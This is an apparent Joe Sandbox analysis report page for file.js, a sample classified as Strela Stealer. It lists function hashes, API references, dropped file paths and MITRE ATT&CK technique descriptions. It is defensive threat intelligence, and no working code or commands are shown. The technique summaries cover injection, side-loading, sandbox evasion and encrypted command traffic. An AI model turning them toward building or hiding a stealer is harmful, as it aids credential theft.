Associated: 00000008.00000002.1705360161.00007FFE1026A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe10230000_regsvr32.jbxd

Yara matches

Similarity

API ID: __p___argc__p___wargv__p__wenviron_configure_wide_argv_set_new_mode
String ID:
API String ID: 3305919566-0
Opcode ID: c3cd763eb9e9f8b7c9556cb38ece850fa7336141f25a0961490245c00d1de611
Instruction ID: 132fe945847adbeb865f0e4ac0c5de05305846f945e39d47ef8b1a829edb0cb6
Opcode Fuzzy Hash: c3cd763eb9e9f8b7c9556cb38ece850fa7336141f25a0961490245c00d1de611
Instruction Fuzzy Hash: CD012D76A04F098EE7159F26E4813AC3761EB88798F404570EB0D4B7A7CE38D490C340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFE1023BA70 Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_configure_narrow_argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1023BAA1
__p___argc.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1023BAA6
__p___argv.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1023BAB3
__p__environ.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0 ref: 00007FFE1023BAC2
_set_new_mode.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FFE1023BAE0

Memory Dump Source

Source File: 00000008.00000002.1705262813.00007FFE10231000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FFE10230000, based on PE: true

Associated: 00000008.00000002.1705251716.00007FFE10230000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705275455.00007FFE1023C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705286896.00007FFE1023D000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705298103.00007FFE1023E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705314213.00007FFE1025B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705326272.00007FFE1025D000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705347547.00007FFE10261000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705360161.00007FFE10264000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705360161.00007FFE10266000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000008.00000002.1705360161.00007FFE1026A000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ffe10230000_regsvr32.jbxd

Yara matches

Similarity

API ID: __p___argc__p___argv__p__environ_configure_narrow_argv_set_new_mode
String ID:
API String ID: 556796188-0
Opcode ID: d713d1ab00fc09b2163b8151d51110b22cf4d64260805eb9c7e1ae8cb6c399b9
Instruction ID: 254913d659bcfaf2341cb3cf5820ed1f2dcacf6bdb65f23f03e2ff341c4893d9
Opcode Fuzzy Hash: d713d1ab00fc09b2163b8151d51110b22cf4d64260805eb9c7e1ae8cb6c399b9
Instruction Fuzzy Hash: 4901E976A04F498EE715AF26E4853AD37A4EB8CB98F508571E70D4B7A6CE3CD490C740

Uniqueness

Uniqueness Score: -1.00%

Function 02B842D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 201
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 02B842F8
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 02B843E0

Strings

csm, xrefs: 02B84432
csm, xrefs: 02B8431A

Memory Dump Source

Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd

Yara matches

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 0aa7a5c376eeb5ae11e699671e149143c489387923b3f49e9a28d806dabbf491
Instruction ID: 03b7efb2ff19b5feac05cad7833a29443d909a818d564723ea90c74ac6f18556
Opcode Fuzzy Hash: 0aa7a5c376eeb5ae11e699671e149143c489387923b3f49e9a28d806dabbf491
Instruction Fuzzy Hash: 33618134218B4A8FCB68FF289084765B7E1FB58315F5C46AED49DC7651CB70D885CB82

Uniqueness

Uniqueness Score: -1.00%

Function 02B82690 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 02B826BB
_IsNonwritableInCurrentImage.LIBCMT ref: 02B82752

Strings

csm, xrefs: 02B82739

Memory Dump Source

Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd

Yara matches

Similarity

API ID: CurrentImageNonwritable__except_validate_context_record
String ID: csm
API String ID: 3242871069-1018135373
Opcode ID: e32cc06ee6daa03ae3f3bc1a8189994b09bd6cfa9f32bc22b13863d2a7eee494
Instruction ID: 0be6dfce24e7814735482a9da30034dee47f7f1f0d9002de67a9db724b75c611
Opcode Fuzzy Hash: e32cc06ee6daa03ae3f3bc1a8189994b09bd6cfa9f32bc22b13863d2a7eee494
Instruction Fuzzy Hash: EE61AF30618A898BDF28FE5DD885A7973D1FB54354B1041AEEC8AC3256EB30FC52CB85

Uniqueness

Uniqueness Score: -1.00%

Function 02B83F20 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_CallSETranslator.LIBVCRUNTIME ref: 02B83FCB

Strings

MOC, xrefs: 02B83F93
RCC, xrefs: 02B83F9B

Memory Dump Source

Source File: 00000008.00000002.1705219928.0000000002B81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B81000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_2b81000_regsvr32.jbxd

Yara matches

Similarity

API ID: CallTranslator
String ID: MOC$RCC
API String ID: 3163161869-2084237596
Opcode ID: 07c68a8826f396dc2633518cec89643c6e24fd7e0188cafc8116b23aa0883d7f
Instruction ID: dab6447ae6f46b1c2aebaa52fd2ff36f654556f9357f9325e455b2ce29fd7749
Opcode Fuzzy Hash: 07c68a8826f396dc2633518cec89643c6e24fd7e0188cafc8116b23aa0883d7f
Instruction Fuzzy Hash: A8719230518B898FD768FF68C446BAAB7E0FB99304F144A9ED48DC3251DB74E581CB82

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.js

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Strela Stealer

Yara Signatures

Initial Sample

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

HIPS / PFW / Operating System Protection Evasion

Snort Signatures

Joe Sandbox Signatures

AV Detection

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gw4xkmxd.b3h.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jyezsyz1.ev4.psm1

C:\Users\user\childlikeclearintroduce.ico

C:\Users\user\deepdidacticfour

C:\Users\user\stiffrelievedawesome.bat

C:\Users\user\stiffrelievedawesome.bat:Zone.Identifier

Static File Info

General

File Icon

Network Behavior

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

Windows Analysis Report
file.js

Function 02B86908 Relevance: 1.5, APIs: 1, Instructions: 20
COMMON

Function 00007FFE102314B0 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 40
libraryloaderCOMMON

Function 02B83A50 Relevance: 12.7, APIs: 4, Strings: 3, Instructions: 463
COMMON

Function 00007FFE1023A960 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 183
COMMON

Function 00007FFE1023BAF0 Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Function 00007FFE1023BA70 Relevance: 7.5, APIs: 5, Instructions: 37
COMMON

Function 02B842D0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 201
COMMON

Function 02B82690 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 233
COMMON

Function 02B83F20 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 233
COMMON